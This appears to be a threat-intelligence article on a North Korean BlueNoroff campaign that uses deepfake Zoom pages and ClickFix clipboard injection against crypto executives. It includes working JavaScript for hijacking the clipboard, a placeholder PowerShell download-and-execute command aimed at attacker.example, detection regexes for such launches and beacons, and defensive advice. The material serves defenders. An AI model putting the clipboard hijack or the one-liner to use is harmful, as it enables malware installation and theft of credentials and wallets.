A sophisticated new cyberattack campaign attributed to BlueNoroff, a financially motivated subgroup of North Korea’s Lazarus Group, is actively targeting cryptocurrency and Web3 professionals using AI-generated deepfake Zoom interfaces, fileless PowerShell execution, and a self-reinforcing fake identity pipeline. The campaign has spread across more than 20 countries, with the United States accounting for 41% of all identified victims. CEOs and founders represent 45% of targets, reflecting BlueNoroff’s laser focus on individuals with direct access to digital asset holdings.
The Attack Chain: From Fake Zoom Link to Full Compromise
The campaign begins with attackers posing as investors, business partners, or conference organizers and approaching targets through LinkedIn, Telegram, or email. After establishing rapport, they invite the target to a Google Meet call. At the moment the victim confirms the meeting, the attacker quietly replaces the Google Meet link with a typo-squatted Zoom URL designed to look nearly identical to the real thing.
When the victim clicks the fake link, their browser loads a self-contained HTML page that mimics the Zoom meeting interface with remarkable fidelity — complete with fake participant video tiles, looping footage, and a simulated loading screen. Crucially, the page displays a fake technical error message claiming the victim’s microphone or camera drivers need to be reinstalled.
ClickFix Clipboard Injection: The Hidden Payload
This is where the ClickFix-style clipboard injection comes in. The page shows what look like harmless diagnostic commands and instructs the victim to copy them and paste them into the Windows Run dialog (Win+R) or a terminal. What the victim does not see is that the page's copy handler overwrites the clipboard at the moment of copying, so the text that lands in the Run dialog is a PowerShell one-liner rather than the command displayed on screen. No software flaw is exploited: the victim launches the malware by pressing Enter.
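To make the mechanism concrete, here is an added example of the copy-event hijack that ClickFix-style pages rely on, written in plain browser JavaScript. It is not code recovered from the campaign's lure page: the decoy command, the replacement payload and the host `attacker.example` are constructed placeholders, not indicators from the campaign, and the simulation at the bottom exists only so the file runs outside a browser.

```javascript
// Added example: how a ClickFix-style lure page swaps the clipboard contents
// at copy time. Everything below is constructed for illustration; the payload
// and host are placeholders, not indicators from the campaign.

// Decoy text the victim sees on the page and believes they are copying.
const VISIBLE_COMMAND = 'ipconfig /flushdns';

// What actually lands on the clipboard (constructed placeholder, not the real
// stage-1 command). Note the traits defenders look for: hidden window,
// download into %TEMP%, immediate execution of the downloaded script.
const HIDDEN_COMMAND =
  'powershell -w hidden -c "iwr https://attacker.example/s -OutFile $env:TEMP\\chromechip.ps1; & $env:TEMP\\chromechip.ps1"';

// Copy-event handler. `copy` fires when the user presses Ctrl+C or chooses
// Copy. A page may override what reaches the clipboard by writing to
// event.clipboardData and calling preventDefault(); without preventDefault()
// the browser writes the genuine selection instead.
function hijackCopy(event, payload) {
  if (!event.clipboardData) return false;        // nothing to tamper with
  event.clipboardData.setData('text/plain', payload);
  event.preventDefault();                         // suppress the real selection
  return true;
}

// Attaches the hijack to any EventTarget (`document` in a real page) and
// returns an uninstaller. Some lure pages instead call
// navigator.clipboard.writeText(payload) from a "Copy" button; the effect on
// the victim is the same.
function installClipboardHijack(target, payload) {
  const handler = (event) => hijackCopy(event, payload);
  target.addEventListener('copy', handler);
  return () => target.removeEventListener('copy', handler);
}

// Defender-side check: after a hijack the clipboard never matches the text
// the victim thinks they copied, which is why pasting into Notepad before the
// Run dialog exposes the trick.
function clipboardMatchesVisible(visible, clipboard) {
  return visible.trim() === clipboard.trim();
}

// Simulation so this runs under Node (15+), which provides EventTarget and
// Event. The fake DataTransfer stands in for the browser's clipboard object.
function simulateCopy() {
  const captured = {};
  const fakeDataTransfer = { setData: (type, value) => { captured[type] = value; } };
  const target = new EventTarget();
  const uninstall = installClipboardHijack(target, HIDDEN_COMMAND);
  const ev = new Event('copy', { cancelable: true });
  ev.clipboardData = fakeDataTransfer;
  target.dispatchEvent(ev);
  uninstall();
  return { clipboard: captured['text/plain'], defaultPrevented: ev.defaultPrevented };
}

const result = simulateCopy();
console.log('visible  :', VISIBLE_COMMAND);
console.log('clipboard:', result.clipboard);
console.log('matches  :', clipboardMatchesVisible(VISIBLE_COMMAND, result.clipboard));
```

The point of the simulation is the last line: the displayed command and the clipboard contents disagree, and nothing on the page reveals that unless the victim inspects the clipboard somewhere other than the Run dialog.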
The injected PowerShell command downloads an obfuscated second-stage script from the attacker's command-and-control server, saves it to the user's Temp folder as chromechip.ps1, and runs it in a hidden window. That script installs a persistent C2 beacon that lives entirely in memory, so apart from the dropped chromechip.ps1 (and incidental traces such as the Run dialog's RunMRU history) there are few conventional on-disk malware artifacts for endpoint detection tools to find. The beacon polls the attacker's server every five seconds and collects:
- Hostname, OS version, and running processes
- Administrative privilege status
- Timezone data and system locale
- Browser-stored credentials, saved passwords, and session cookies
- Telegram session data and cryptocurrency wallet credentials
- Live webcam footage transmitted continuously to attacker infrastructure
Researchers found that the full attack chain, from the initial click to complete system compromise, finished in under five minutes. Forensic analysis of one victim showed that the attacker retained access for 66 days before detection.
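The chain described above leaves two host-side signals worth hunting for: a PowerShell launch from the Run dialog whose command line carries the traits listed (hidden window, download into Temp, the chromechip.ps1 name), and a connection pattern that repeats every five seconds. The following is an added example of both checks; it is not the researchers' detection logic. The event records are constructed in a Sysmon-like shape, and the field names, the host `attacker.example` and the scoring thresholds are assumptions.

```javascript
// Added example: detection logic for the post-click stage of the chain.
// Event shapes, thresholds and all sample data are constructed for illustration.

// Traits a ClickFix-delivered PowerShell launch tends to exhibit. Each hit adds
// one reason. The explorer.exe parent (Run dialog) is treated separately because
// legitimate software rarely spawns PowerShell that way.
const PS_IMAGE = /(^|\\)(powershell|pwsh)\.exe$/i;
const INDICATORS = [
  { re: /(^|\s)-(w|win|windowstyle)\s+h(idden)?\b/i, why: 'hidden window' },
  { re: /(^|\s)-(ep|ex|executionpolicy)\s+bypass\b/i, why: 'execution policy bypass' },
  { re: /\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|curl)\b/i, why: 'downloader cmdlet' },
  { re: /\$env:temp|%temp%|\\appdata\\local\\temp\\/i, why: 'writes to Temp' },
  { re: /chromechip\.ps1/i, why: 'known stage-2 filename' },
];

// Scores one process-creation event; returns { score, reasons }.
function scoreProcessEvent(evt) {
  if (!PS_IMAGE.test(evt.image || '')) return { score: 0, reasons: [] };
  const reasons = [];
  if (/(^|\\)explorer\.exe$/i.test(evt.parentImage || '')) {
    reasons.push('spawned from Run dialog (explorer.exe parent)');
  }
  for (const ind of INDICATORS) {
    if (ind.re.test(evt.commandLine || '')) reasons.push(ind.why);
  }
  return { score: reasons.length, reasons };
}

// Beacon check: group outbound connections by (process, destination) and look
// for a run of at least minCount consecutive gaps within `tolerance` seconds of
// `period`. Human-driven traffic has irregular gaps and breaks the run.
function findBeacons(conns, period = 5, tolerance = 0.5, minCount = 6) {
  const byKey = new Map();
  for (const c of conns) {
    const key = `${c.image}|${c.dest}`;
    if (!byKey.has(key)) byKey.set(key, []);
    byKey.get(key).push(c.ts);
  }
  const hits = [];
  for (const [key, times] of byKey) {
    const t = [...times].sort((a, b) => a - b);
    let run = 0, best = 0;
    for (let i = 1; i < t.length; i++) {
      run = Math.abs(t[i] - t[i - 1] - period) <= tolerance ? run + 1 : 0;
      best = Math.max(best, run);
    }
    if (best >= minCount) hits.push({ key, periodicIntervals: best });
  }
  return hits;
}

// Constructed sample telemetry (not real events). The first record mirrors the
// shape of the stage-1 launch; the others are benign noise.
const SAMPLE_PROCESSES = [
  { image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    parentImage: 'C:\\Windows\\explorer.exe',
    commandLine: 'powershell -w hidden -c "iwr https://attacker.example/s -OutFile $env:TEMP\\chromechip.ps1; & $env:TEMP\\chromechip.ps1"' },
  { image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    parentImage: 'C:\\Windows\\System32\\svchost.exe',
    commandLine: 'powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1' },
  { image: 'C:\\Windows\\System32\\ipconfig.exe',
    parentImage: 'C:\\Windows\\System32\\cmd.exe',
    commandLine: 'ipconfig /flushdns' },
];

// Twelve check-ins exactly 5 s apart from the hidden PowerShell, plus jittery
// browser traffic that must not trigger the beacon rule.
const SAMPLE_CONNECTIONS = [];
for (let i = 0; i < 12; i++) {
  SAMPLE_CONNECTIONS.push({ ts: 1000 + 5 * i, image: 'powershell.exe', dest: 'attacker.example:443' });
}
for (const ts of [1001, 1007, 1030, 1031, 1058]) {
  SAMPLE_CONNECTIONS.push({ ts, image: 'chrome.exe', dest: 'cdn.example:443' });
}

function runDetections() {
  const flagged = SAMPLE_PROCESSES.map(scoreProcessEvent).filter((r) => r.score >= 3);
  const beacons = findBeacons(SAMPLE_CONNECTIONS);
  return { flagged, beacons };
}

console.log(JSON.stringify(runDetections(), null, 2));
```

On the constructed data the Run-dialog launch scores 5 of a possible 6 reasons while the scheduled inventory script scores 0, and only the PowerShell-to-attacker.example pair shows eleven consecutive five-second gaps. The interval and tolerance are parameters because the five-second period is specific to this campaign; a real deployment would sweep several periods.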
AI-Generated Deepfake Pipeline
What makes this campaign especially dangerous is its self-reinforcing deepfake production mechanism. Analysts uncovered more than 950 files on the attacker’s hosting server, including AI-generated profile photographs, fabricated LinkedIn profiles, and synthetic video recordings of fake executives used as Zoom participants. Each successful attack feeds raw material — real webcam footage of victims — into the next campaign, making future fake meetings increasingly convincing and harder to distinguish from real video calls.
Who Is Being Targeted
BlueNoroff has historically focused its financial theft operations on cryptocurrency exchanges, DeFi protocols, and blockchain developers. This campaign represents an evolution toward targeting the decision-makers and founders of Web3 companies directly, bypassing technical defenses by exploiting human trust and social engineering rather than software vulnerabilities. The geographic spread — more than 20 countries — suggests a systematic, intelligence-driven targeting operation rather than opportunistic attacks.
Defensive Recommendations
Organizations in Web3, cryptocurrency, and financial services should implement the following protections immediately:
- Verify all meeting links through a secondary communication channel before joining any call from a new contact
- Never run terminal commands, PowerShell scripts, or Run dialog entries provided by a website, regardless of how the instruction is framed
- Rotate all browser-stored passwords, API keys, and cryptocurrency wallet credentials if a suspicious meeting link was clicked, and revoke active sessions, since the beacon also harvests session cookies and Telegram session data; if the pasted command was actually executed, treat the host as fully compromised and rebuild it rather than attempting to clean it
- Enable application allowlisting to prevent execution of unauthorized PowerShell scripts, keeping in mind that file-based allowlisting alone does not stop a one-liner typed into the Run dialog, because powershell.exe itself remains an allowed binary
- Deploy memory-based endpoint detection capable of identifying fileless malware and in-memory beacons, and enable PowerShell script block logging so that the decoded content of scripts is recorded even when they never touch disk
- Train staff to recognize ClickFix-style social engineering — legitimate platforms never ask users to run terminal commands to resolve audio or camera issues
This campaign demonstrates that North Korea’s cyber operations continue to advance in technical sophistication, combining AI-generated content, fileless execution, and deep social engineering into a highly effective financial theft pipeline. The combination of a zero-disk-footprint implant and a deepfake video lure represents a genuinely difficult-to-defend attack surface that goes well beyond conventional phishing awareness training.